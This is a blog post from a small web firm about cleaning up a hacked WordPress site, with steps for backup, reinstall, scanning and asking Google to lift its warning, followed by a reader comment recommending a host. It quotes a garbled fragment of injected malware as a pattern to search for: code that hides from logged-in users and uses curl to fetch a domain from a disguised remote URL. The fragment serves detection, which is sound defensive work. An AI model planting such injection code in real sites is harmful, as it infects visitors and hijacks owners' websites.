WordPress Hacked?

Posted on by in Wordpress

Had your wordpress website hacked? We have been helping a lot of businesses overcome this problem, so we thought we would set out the steps we take to remove malware warnings and viruses. If you have had your website branded on Google with the dreaded “This site may harm your computer” dont panic.  The first thing you always do is was rage and deny that there is anything wrong. Use the Unmask Parasites tool, to find the problem and where it is, this will give you a few clues as to what you are looking for in your problem. Often you will find a hidden iframe link to a “.to” website or some other malicious domain.

We are no security experts, but we do understand how basic hackers work. This advice is meant as a guide, don’t sue us if you get it wrong. There are two things to keep in mind when working with this sort of problem.

  1. The hacker has a malicious intent, so whatever they are doing it will leave traces and links to files or websites. The hacked will also try to cover their tracks, and in the end sometimes the only thing you can do is set fire to your server.
  2. The hacker will have created, or forced, a way into your system that will be different to the traces they leave. You have to address this problem before your virus/malware problem will really go away. This can sometimes mean your host is infected or it might just mean your password is insecure.

Don’t Panic

Create a fresh backup of your WHOLE website and database, marked “infected”. Use a HTML scanner to search the source code of your whole website for code that looks like this;

<!-- WordPress Counter -->

if ( !is_user _logged_in() && !isset ( $_ COOKIE['MTPT'] ) ) 

<script language="javascript"
var Exp Date = new Date ();
ExpDate. setTime (ExpDate.getTime() + (7 * 24 * 60 * 60));
Set Cookie ("MTPT","1",ExpDate, "/");

function get_new_ domain () {
	$url = 'http: //google safe browsing .com /remoted';
	if ( function_ exists ( 'curl_init' ) ) {
		$ch = @curl_ init ( $url );

		$doms = @curl_ exec ( $ch );

Also, search for iframes, and  basecode64(). Sometimes it will be hard to find all the files that will be infected, but the best places to start are the header, footer, load-template and admin files. Right now you are looking for confirmation that this code is part of your problem. You can delete these references, but there may be more you have missed. Ultimately you will have to install a fresh version of your template, but we will get to that in a minute.

Get to the Cause

Search around on the web. There are common security problems associated with Tim Thumb, like  WooThemes framework and an old version of TimThumb, which was originally compromised. This will also give you an idea of the problem you have, and how to solve it.

Start Again

Follow the following steps to remove the malware warning. This will keep most of your content, but it may also leave you vulnerable if your website has a database flaw.

  1. Delete all users except the admin one. Make sure you change the username and password of the administrator.
  2. Create a folder on your computer with a name like “VIRUS WEBSITE”.
  3. Make sure you have a backup of everything. Use FTP or Filemanager in cPanel to grab a copy of all the files on your site and move it to your virus folder.
  4.  Back up your database, export a copy using PHPMyAdmin to the same virus folder.
  5. Create a new folder called “Fresh Website copy” or something similar
  6. Save a copy of your wp-config.php file in your fresh folder.
  7. Download a fresh copy of WordPress from wordpress.org to your fresh folder.
  8. Delete EVERY file in your www/web main directory. Make sure that there is nothing left on your host www folder.
  9. Unzip and FTP WordPress to your website. Do not try to upgrade or reinstall from the admin section of wordpress, this method is incomplete.
  10. Install wordpress.
  11. Download a fresh copy of your theme to your “fresh” folder, and FTP that to wp-content/themes folder. If you have modified your theme in any significant way, you will have lost those changes. The only way to make sure you have got the problem licked is to install a fresh copy of your theme, or go through your theme line by line to make sure there is nothing that is causing the issue.
  12. Add your wp-config.php file back into the root of your directory.
  13. You should be able to log back in to your wp-admin section.
  14. Change your password
  15. Install WordPress Firewall 2
  16. Install WordPress exploit scanner and run. This will tell you if there is a problem with your database.
  17. Use Sucuri’s scanner to see if you are virus free. If you had removed all your files, and carried out a clean install, you should be virus free.
  18. Notify Google you are clean using the Google Webmaster tools.
  19. If you had a large number of files/images uploaded, you could upload your wp-content/uploads folder, but this may be harbouring viruses, so you may have to recreate those files manually.

How Long Does it Take for the Warning to Go Away?

From us sending in the request to the Malware warning being removed took less than 8 hours. In all we lost almost a full day of traffic from Google, which is about 50% of the total. Only two clients noticed the problem, but we had to send out a warning to most of them, letting them know of the compromise, so in the end they all found out. We have learned a lot about what is considered secure on the web (nothing) and what is vulnerable (almost everything).

View ratings
Rate this article
Share

2 Responses to “WordPress Hacked?”

  1. Ira 21 April 2012 at 10:08 am #

    I would suggest that you sign up for an account with theshosting.com. They provide free malware removal services on anybody hosted on there servers. My site was hacked at blue host and they were able to transfer it from blue host and also remove the malware injection for free!

    They were even able to tell me exactly where the hack originated from as well. They said it came from an outdated timthumb.php file which they were able to update for me.

    They also did a scan of my account and told me all the security vulnerabilities of my account.

    I honestly suggest switching over to them if your website is hacked. They can transfer and remove the hack from your site. Best of all they do this for free.

    • Robert Steers 21 April 2012 at 10:50 am #

      Interesting, and a really great service. Probably pretty invaluable for small businesses who might not know what to do if they were hacked. Thanks for the tip!


Let us know what you think about this article!